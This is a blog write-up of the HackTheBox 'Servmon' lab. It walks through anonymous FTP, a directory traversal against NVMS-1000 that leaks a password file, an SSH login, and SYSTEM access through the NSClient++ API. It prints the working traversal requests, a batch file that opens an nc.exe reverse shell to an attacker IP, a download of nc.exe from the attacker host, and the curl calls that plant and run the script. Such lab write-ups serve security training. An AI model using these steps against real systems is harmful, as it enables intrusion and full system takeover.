Posts Hackthebox Servmon writeup
Post
Cancel

Hackthebox Servmon writeup

Information

ColumnDetails
NameServmon
IP10.10.10.184
Points20
OsWindows
DifficultyEasy
Creatordmw0ng
Out On11 April 2020

Brief

Relatively a very easy box.Login to the FTP as anonymous login is allowed.The service nvms-1000 is vulnerable to a public exploit(Directory inclusion).Reading the Passwords.txt file using the Dir-traversel.Hit and trial to ssh login as user Nadine.The service running on port 8443 Nsclient is vulnerable to public exploits and we can use that to get root.

Summary

  • Login to ftp anonymously
  • Getting info from note.txt that there is a Passwords.txt in Nathan/Desktop
  • Dir-traversel on the NVMS-1000
  • Extracting the Passwords.txt
  • Logged in as Nadine
  • Got user.txt
  • Port forward the port 8443 (Nsclient++)
  • Uploading script to nsclient++ api.
  • Executing the script in the time interval of 1.
  • Got root.txt

Pwned

Recon

Nmap

  • -sV : for Displaying service version
  • -sC : For Displaying Common-scripts availbale for that service
  • -p- : Scan for all the ports (65,535)
  • -T4 : Quick results
  • -oA : save the result in an output file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
➜  servmon nmap -sV -sC -T4 -p- servmon.htb -oA nmap.full 
# Nmap 7.80 scan initiated Sun Apr 12 08:41:28 2020 as: nmap -sV -sC -p- -T4 -oA nmap.full -v servmon.htb
Increasing send delay for 10.10.10.184 from 0 to 5 due to 1019 out of 2547 dropped probes since last increase.
Warning: 10.10.10.184 giving up on port because retransmission cap hit (6).
Nmap scan report for servmon.htb (10.10.10.184)
Host is up (0.26s latency).
Not shown: 65459 closed ports, 57 filtered ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesnt have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
7680/tcp  open  pando-pub?
8443/tcp  open  ssl/https-alt
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after:  2021-01-13T13:24:20
| MD5:   1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
|_SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/12%Time=5E9259F7%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/12%Time=5E925A01%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8,\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x201
SF:8\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x
SF:20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSP
SF:Request,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x
SF:20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2h33m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T02:36:02
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 09:02:55 2020 -- 1 IP address (1 host up) scanned in 1286.80 seconds

So many Ports are opened Lets start enumerating them one by one

FTP (Port 21)

Port 21 is opened and i tried for anonymous login

1
2
3
4
5
6
7
8
9
➜  servmon ftp servmon.htb 
Connected to servmon.htb.
220 Microsoft FTP Service
Name (servmon.htb:prashant): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 

And we are logged in anonymously.

There is a dir Called Users.

1
2
3
4
5
6
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp>

and it has two sub-Dirs

1
2
3
4
5
6
7
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.
ftp>

We got two Files from both the Dirs.

  1. Confidential.txt from Nadine Directory
  2. Notes to do.txt from Nathan Directory
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> pwd
257 "/Users/Nadine" is current directory.
ftp> cd ../Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp>

These Files contains the follwoing contents

  • Confidential.txt
1
2
3
4
5
6
7
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine
  • Notes to do.txt
1
2
3
4
5
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint                       

So the file Confidential.txt talks about that there is a file called passwords.txt in the Desktop of user Nathan.Hmmmmm interesting

And the file Notes to do.txt talks about the password change of the NSclient service.

Port 8443(NsClient++)

Nsclient++

It has a login page only with a password requirement.

The port 8443 is running Nsclient++ and i searched for its available public exploits. And got a privilege escaltion exploit from exploit-db

Nsclient++

Nsclient++ exploit

But i cant think of privilege escaltion without having a proper shell….so just moved on.

Port 80 (Nvms-1000)

There is a service running on port 80 called Nvms 1000.and it has a login page too.

Nvms-1000

I searched for possible exploits for the Service and i got a Directory traversal / Dir-traversel exploit from exploit-db

NVMS-Exploit

And the exploit says about the Directory traversal using

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Now i remeber the concept of the Passwords.txt file from the confidential.txt we have to get its content with the same exploitation since it is in Nathan’s Deaktop dir.I am using Burp suite for my hit and trials.

Need to fire up my burp now…

So i just captured the request from the home npage and send it to Repeater.

To Test the Dir-traversel….I sent this request

1
2
3
4
5
6
7
8
9
10
11
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: servmon.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://servmon.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: dataPort=6063; lang_type=0x0409%24en-us
Connection: close

And got the Following response

1
2
3
4
5
6
7
8
9
10
11
12
13
HTTP/1.1 200 OK
Content-type: 
Content-Length: 92
Connection: close
AuthInfo: 

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Now it confirmed the Dir-traversel Lets try to Extract the Passwords.txt which is in the following dir

/Users/Nathan/Desktop/Passwords.txt

1
2
3
4
5
6
7
8
9
10
11
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: servmon.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://servmon.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: dataPort=6063; lang_type=0x0409%24en-us
Connection: close

And Got the following Response

1
2
3
4
5
6
7
8
9
10
11
12
13
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Now i got too many passwords since the port 22:ssh is opened and i can try on it.

The user will be Nadine For sure because he wrote a letter to Nathan that he left the passwords.txt file in his Desktop.

1
2
3
4
5
6
➜  servmon ssh Nadine@servmon.htb 
Nadine@servmon.htb password: 
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

And i got logged in on Nadine:L1k3B1gBut7s@W0rk

Its better to Spawn a powershell

1
2
3
4
5
6
7
nadine@SERVMON C:\Users\Nadine>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.   

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> 

Got user.txt

1
2
3
PS C:\Users\Nadine\Desktop> cat .\user.txt
ea4-------------------------95a1
PS C:\Users\Nadine\Desktop> 

Privilege Escalation

Now The next goal is to achieve Admin Privileges. I remember the port 8443 which is running Nsclient++ service on it.And now i have a shell so i can go for that privilege escalation exploit.

The exploit include the first step as extracting the nsclient++ password

1
2
3
4
5
6
7
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

We have the proper shell to read the pass… according to the exploit the password is saved in c:\program files\nsclient++\nsclient.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\Users\Nadine> cat 'c:\program files\nsclient++\nsclient.ini'
# If you want to fill this file with all available options run the following com
mand:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults    
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

Then i entered the password in the Login page…

Login

Its says 403 Your not allowed maybe the password is wrong

But how can it be wrong…..

Now i just tried to forward the local port 8443 running on servmon maybe the creator want us to do that

1
2
3
4
5
6
7
  servmon ssh -L 8443:127.0.0.1:8443 Nadine@servmon.htb
Nadine@servmon.htb password: 

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

If i check for local ports on my machine 8443 islisted here

1
2
3
➜  prashant ss -nlt
State               Recv-Q              Send-Q                           Local Address:Port                            Peer Address:Port                              
LISTEN              0                   128                                  127.0.0.1:8443                                 0.0.0.0:*                 

And i can surf it on my web-browser now

By – https://127.0.0.1:8443/

And entered the password and i m logged in

Logged-in

And Now i can move on to exploit

I will be using the api for explotaion because the exploting with browser didnt worked for me….

So the exploit say about

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
	@echo off
	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
	nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

So the exploit say about specifying our external script and applying an interval of 1m

I did it through the nsclient++ api.

Here is the documentation about the api of nsclient https://docs.nsclient.org/api/scripts/

And we can upload our script https://localhost:8443/api/v1/scripts/ext/scripts/shell

Where shell is the script name after uploading it.

And then we can execute the script with the queries available.

Read here https://docs.nsclient.org/api/rest/queries/#command-execute

SO….here is waht i m going to do

I m going to upload an external script shell.bat to the api. This will be the content of the shell.bat file

1
2
@echo off
c:\tmp\nc.exe 10.10.14.52 1234 -e powershell.exe

And i will download the nc.exe to the servmon machine in /tmp dir using python server.

1
2
3
4
5
6
7
8
9
10
PS C:\tmp> iwr -uri http://10.10.14.52:8080/nc64.exe -o nc.exe
PS C:\tmp> ls


    Directory: C:\tmp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       14/04/2020     06:52          43696 nc.exe
1
2
3
➜  Tools python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.184 - - [14/Apr/2020 12:18:56] "GET /nc64.exe HTTP/1.1" 200 -

And then i ll make a curl request to the api to PUT the shell.bat

1
2
3
4
5
6
7
8
➜  servmon curl -i -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/shell.bat --data-binary @shell.bat

HTTP/1.1 200
Content-Length: 32
Set-cookie: token=frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ; path=/
Set-cookie: uid=admin; path=/

Added shell as scripts\shell.bat

I got a message saying the script is added

now i can execute the script by making a request to https://localhost:8443/api/v1/queries/shell/commands/execute?time=1

?time=1 specify the time interval = 1 minute

And i make the following request

1
➜  servmon curl -i -k -u admin:ew2x6SsGTxjRwXOT 'https://localhost:8443/api/v1/queries/shell/commands/execute?time=1'

As soon as i make the request i got the response on my nc listener

1
2
3
4
5
6
7
8
9
  servmon nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.10.184] 52839
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\NSClient++>
1
2
3
4
PS C:\Program Files\NSClient++> whoami
whoami
nt authority\system
PS C:\Program Files\NSClient++> 

Got root.txt

1
2
3
4
PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
64e1-------------------------f274
PS C:\users\Administrator\Desktop> 

And we pwned it …….

Donations

If u like My Content.Support a Poor Student who is collecting money to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

ColumnDetails
NVMS-1000 exploitNVMS-1000
Nsclient++ ExploitNsclient++ exploit
Nsclient apiNsclient++ Api
Nsclient++ QueriesQueries api
Updated Jun 23, 2020 2020-06-23T09:33:53+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.